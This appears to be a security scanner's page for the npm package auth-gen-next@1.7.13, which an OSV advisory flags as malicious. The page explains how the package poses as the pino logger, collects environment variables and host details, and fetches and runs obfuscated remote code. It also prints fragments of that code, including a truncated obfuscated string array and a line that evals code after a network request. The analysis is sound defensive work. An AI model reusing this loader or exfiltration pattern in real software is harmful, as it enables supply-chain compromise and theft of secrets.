registry  /  auth-gen-next  /  1.7.13

auth-gen-next@1.7.13

OSV Malicious Advisory

scanned 8h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10449 confirms this npm version as malicious. The package impersonates the pino logger (README assets, keywords, and internal filenames such as lib/proto.js, lib/multistream.js, lib/redaction.js, lib/transport.js, lib/writer.js are pino-branded) but its declared purpose is unrelated. On require, index.js loads lib/writer.js, which builds an object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC...

Advisory
MAL-2026-10449
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in auth-gen-next (npm)
Details
The package impersonates the pino logger (README assets, keywords, and internal filenames such as lib/proto.js, lib/multistream.js, lib/redaction.js, lib/transport.js, lib/writer.js are pino-branded) but its declared purpose is unrelated. On require, index.js loads lib/writer.js, which builds an object containing the full process.env, os.platform(), os.hostname(), os.userInfo().username, and non-internal MAC addresses, then unconditionally invokes context.data() from lib/content.js. That function issues an axios GET to https://pro-api.coinmarketcap.com/public-api/v1/ and eval()s a heavily obfuscated string (obfuscator.io-style string array with base64/XOR/RC4 decoders) that reconstructs a JSON-RPC eth_call transport, XOR-decodes the response, and spawns a child process using process.execPath to execute the retrieved payload. lib/writer.js additionally contains a hex-encoded fallback loader decoding to https://www.jsonkeeper.com/b/HY6M6. lib/content.js is heavily obfuscated (while(!![]), array-shift decoder) to hide the destinations and payload from review.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessDynamicRequireEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsMinifiedUrlStrings
ManifestNo manifest risk signals triggered.
scanned 18 file(s), 82.2 KB of source, external domains: github.com, pro-api.coinmarketcap.com

Source & flagged code

4 flagged · loading source
lib/content.jsView file
1const cdata = "function M(){const MO=['CgfYC2u','wdjoDMi','CMLUzW','AMn3txO','mtGYmdi0n1fgtMTitq','ywnisNy','uMmZqMG','tuWZuNK','tK1esxC','Aw5WDxq','z2LMEq','wwfhoxO','mZuZody0mffY... L2:
High
Obfuscated Payload Loader

Source contains an obfuscator-style string-array loader that reconstructs and executes hidden code.

lib/content.jsView on unpkg · L1
3module.exports = { L4: data: () => require('axios').get('https://pro-api.coinmarketcap.com/public-api/v1/').then(r => {eval(cdata)}) L5: };
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/content.jsView on unpkg · L3
index.jsView file
2L3: const writer = require('./lib/writer'); L4: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants')
Medium
Dynamic Require

Package source references dynamic require/import behavior.

index.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

1 High5 Medium4 Low
HighObfuscated Payload Loaderlib/content.js
MediumDynamic Requireindex.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
MediumSecret Patterndocs/transports.md
LowScripts Present
LowEvallib/content.js
LowHigh Entropy Strings
LowUrl Strings